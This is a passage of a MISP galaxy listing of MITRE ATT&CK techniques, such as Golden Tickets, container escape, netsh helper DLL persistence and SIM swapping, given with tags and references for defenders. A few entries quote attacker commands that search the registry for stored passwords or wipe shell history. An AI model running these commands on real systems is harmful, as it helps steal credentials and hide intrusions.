Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097"

View relationships graph

Pass the Ticket - T1097 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 3533. Table References
Links
https://attack.mitre.org/techniques/T1097
https://capec.mitre.org/data/definitions/645.html
https://adsecurity.org/?p=556
http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf

Disabling Security Tools - T1089

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.

The tag is: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089"

View relationships graph

Disabling Security Tools - T1089 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 3534. Table References
Links
https://attack.mitre.org/techniques/T1089
https://capec.mitre.org/data/definitions/578.html

Space after Filename - T1151

Adversaries can hide a program’s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:mitre-attack-pattern="Space after Filename - T1151"

View relationships graph

Space after Filename - T1151 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Space after Filename - T1036.006" with estimative-language:likelihood-probability="almost-certain"

Table 3535. Table References
Links
https://attack.mitre.org/techniques/T1151
https://capec.mitre.org/data/definitions/649.html
https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/

Escape to Host - T1611

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.

The tag is: misp-galaxy:mitre-attack-pattern="Escape to Host - T1611"

Table 3536. Table References
Links
https://attack.mitre.org/techniques/T1611
https://docs.docker.com/get-started/overview/
https://docs.docker.com/storage/bind-mounts/
https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html
https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/
https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/

Create strategic plan - T1231

Strategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)

The tag is: misp-galaxy:mitre-attack-pattern="Create strategic plan - T1231"

Table 3537. Table References
Links
https://attack.mitre.org/techniques/T1231

Capture SMS Messages - T1412

A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.

On Android, a malicious application must request and obtain permission (either at app install time or run time) in order to receive SMS messages. Alternatively, a malicious application could attempt to perform an operating system privilege escalation attack to bypass the permission requirement.

On iOS, applications cannot access SMS messages in normal operation, so an adversary would need to attempt to perform an operating system privilege escalation attack to potentially be able to access SMS messages.

The tag is: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412"

Table 3538. Table References
Links
https://attack.mitre.org/techniques/T1412

Credentials in Registry - T1214

The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)

Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>
Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1214"

View relationships graph

Credentials in Registry - T1214 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

Table 3539. Table References
Links
https://attack.mitre.org/techniques/T1214
https://pentestlab.blog/2017/04/19/stored-credentials/

System Time Discovery - T1124

An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)

System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim’s time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>. (Citation: Technet Windows Time Service)

This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They’re Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)

The tag is: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"

Table 3540. Table References
Links
https://attack.mitre.org/techniques/T1124
https://capec.mitre.org/data/definitions/295.html
https://msdn.microsoft.com/ms724961.aspx
https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings
https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf
https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/

Determine strategic target - T1241

An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine strategic target - T1241"

Table 3541. Table References
Links
https://attack.mitre.org/techniques/T1241

Standard Cryptographic Protocol - T1521

The tag is: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521"

Table 3542. Table References
Links
https://attack.mitre.org/techniques/T1521

Browser Bookmark Discovery - T1217

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Browser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.

The tag is: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217"

Table 3543. Table References
Links
https://attack.mitre.org/techniques/T1217

Netsh Helper DLL - T1128

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.

Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)

Proof of concept code exists to load Cobalt Strike’s payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)

The tag is: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1128"

View relationships graph

Netsh Helper DLL - T1128 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

Table 3544. Table References
Links
https://attack.mitre.org/techniques/T1128
https://technet.microsoft.com/library/bb490939.aspx
https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
https://github.com/outflankbv/NetshHelperBeacon

Remote Access Software - T1219

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.

Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219"

Table 3545. Table References
Links
https://attack.mitre.org/techniques/T1219
https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf
https://blog.crysys.hu/2013/03/teamspy/

External Remote Services - T1133

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)

Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)

The tag is: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133"

Table 3546. Table References
Links
https://attack.mitre.org/techniques/T1133
https://capec.mitre.org/data/definitions/555.html
https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

Obfuscation or cryptography - T1313

Obfuscation is the act of creating communications that are more difficult to understand. Encryption transforms the communications such that it requires a key to reverse the encryption. (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscation or cryptography - T1313"

Table 3547. Table References
Links
https://attack.mitre.org/techniques/T1313

Access Token Manipulation - T1134

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.

An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)

Any standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

The tag is: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134"

Table 3548. Table References
Links
https://attack.mitre.org/techniques/T1134
https://capec.mitre.org/data/definitions/633.html
https://pentestlab.blog/2017/04/03/token-manipulation/
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx
https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx
https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx
https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf

Account Access Removal - T1531

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.

Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531"

Table 3549. Table References
Links
https://attack.mitre.org/techniques/T1531
https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/
https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

Network Share Discovery - T1135

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"

Table 3550. Table References
Links
https://attack.mitre.org/techniques/T1135
https://capec.mitre.org/data/definitions/643.html
https://en.wikipedia.org/wiki/Shared_resource
https://technet.microsoft.com/library/cc770880.aspx

Office Application Startup - T1137

Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.

A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)

The tag is: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137"

Table 3551. Table References
Links
https://attack.mitre.org/techniques/T1137
https://github.com/sensepost/ruler
https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
https://github.com/sensepost/notruler

Dynamic Data Exchange - T1173

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173"

View relationships graph

Dynamic Data Exchange - T1173 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

Table 3552. Table References
Links
https://attack.mitre.org/techniques/T1173
https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/
https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021
https://technet.microsoft.com/library/security/4053440
https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/
https://www.contextis.com/blog/comma-separated-vulnerabilities
https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

Obfuscate operational infrastructure - T1318

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate operational infrastructure - T1318"

Table 3553. Table References
Links
https://attack.mitre.org/techniques/T1318

Capture Clipboard Data - T1414

Adversaries may abuse Clipboard Manager APIs to obtain sensitive information copied to the global clipboard. For example, passwords being copy-and-pasted from a password manager app could be captured by another application installed on the device.(Citation: Fahl-Clipboard)

On Android, <code>ClipboardManager.OnPrimaryClipChangedListener</code> can be used by applications to register as a listener and monitor the clipboard for changes.(Citation: Github Capture Clipboard 2019)

Android 10 mitigates this technique by preventing applications from accessing clipboard data unless the application is on the foreground or is set as the device’s default input method editor (IME).(Citation: Android 10 Privacy Changes)

The tag is: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414"

Table 3554. Table References
Links
https://attack.mitre.org/techniques/T1414
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.html
http://saschafahl.de/static/paper/pwmanagers2013.pdf
https://github.com/grepx/android-clipboard-security
https://developer.android.com/about/versions/10/privacy/changes#clipboard-data

SIM Card Swap - T1451

An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap)

One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap)

The tag is: misp-galaxy:mitre-attack-pattern="SIM Card Swap - T1451"

Table 3555. Table References
Links
https://attack.mitre.org/techniques/T1451
https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html
http://www.dos.ny.gov/consumerprotection/scams/att-sim.html
https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam
http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/
https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters
https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/
https://techcrunch.com/2017/08/23/i-was-hacked/

URL Scheme Hijacking - T1415

An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).

The tag is: misp-galaxy:mitre-attack-pattern="URL Scheme Hijacking - T1415"

Table 3556. Table References
Links
https://attack.mitre.org/techniques/T1415
https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html
https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html
https://tools.ietf.org/html/rfc7636
https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures

Clear Command History - T1146

macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they’ve done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Clear Command History - T1146"

View relationships graph

Clear Command History - T1146 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 3557. Table References
Links
https://attack.mitre.org/techniques/T1146

System Location Discovery - T1614

Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance’s availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)

Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)

The tag is: misp-galaxy:mitre-attack-pattern="System Location Discovery - T1614"

Table 3558. Table References
Links
https://attack.mitre.org/techniques/T1614
https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
https://securelist.com/transparent-tribe-part-1/98127/

Password Filter DLL - T1174

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.

Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1174"

View relationships graph

Password Filter DLL - T1174 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"

Table 3559. Table References
Links
https://attack.mitre.org/techniques/T1174
http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

Device Type Discovery - T1419

On Android, device type information is accessible to apps through the android.os.Build class (Citation: Android-Build). Device information could be used to target privilege escalation exploits.

The tag is: misp-galaxy:mitre-attack-pattern="Device Type Discovery - T1419"

Table 3560. Table References
Links
https://attack.mitre.org/techniques/T1419
https://developer.android.com/reference/android/os/Build

Spearphishing via Service - T1194

Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194"

View relationships graph

Spearphishing via Service - T1194 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"

Table 3561. Table References
Links
https://attack.mitre.org/techniques/T1194
https://capec.mitre.org/data/definitions/163.html

Group Policy Discovery - T1615

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predicable network path <code>\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\</code>.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615"

Table 3562. Table References
Links
https://attack.mitre.org/techniques/T1615
https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
https://adsecurity.org/?p=2716
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
https://github.com/EmpireProject/Empire

Malicious Shell Modification - T1156

<code>~/.bash_profile</code> and <code>~/.bashrc</code> are shell scripts that contain shell commands. These files are executed in a user’s context when a new shell opens or when a user logs in so that their environment is set correctly. <code>~/.bash_profile</code> is executed for login shells and <code>~/.bashrc</code> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the <code>~/.bash_profile</code> script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the <code>~/.bashrc</code> script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment.

The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling <code>~/.bash_profile</code> each time instead of <code>~/.bashrc</code>.

Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Shell Modification - T1156"

View relationships graph

Malicious Shell Modification - T1156 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004" with estimative-language:likelihood-probability="almost-certain"

Table 3563. Table References
Links
https://attack.mitre.org/techniques/T1156
https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

Browser Session Hijacking - T1185

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary’s browser through the user’s browser by setting up a proxy which will redirect web traffic. This does not alter the user’s traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)

The tag is: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185"

Table 3564. Table References
Links
https://attack.mitre.org/techniques/T1185
https://en.wikipedia.org/wiki/Man-in-the-browser
